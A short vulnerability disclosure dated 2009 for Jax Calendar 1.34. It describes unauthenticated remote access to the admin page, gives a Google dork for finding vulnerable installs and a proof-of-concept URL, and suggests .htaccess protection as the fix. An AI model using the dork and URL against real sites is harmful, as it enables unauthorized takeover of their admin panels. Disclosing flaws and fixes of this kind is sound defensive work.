Jax Calendar 1.34 Remote Admin Access Exploit

# Exploit Title: Jax Calendar 1.34 Remote Admin Access Exploit # Date: December 30th, 2009 # Author: Sora # Software Link: http://www.jtr.de/scripting/php # Version: 1.34 # Tested on: Windows Vista and Linux (Backtrack 3) ---------------------------- > Jax Calendar 1.34 Remote Admin Access Exploit > Author: Sora > Contact: vhr95zw [at] hotmail.com # Google dork: "Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php" Description: Jax Calendar 1.34 suffers a remote admin access vulnerability. Solution: Add calendar.admin.php to your .htaccess file. # POC: http://www.site.com/kalender/admin/calendar.admin.php?cal_id=0&language=english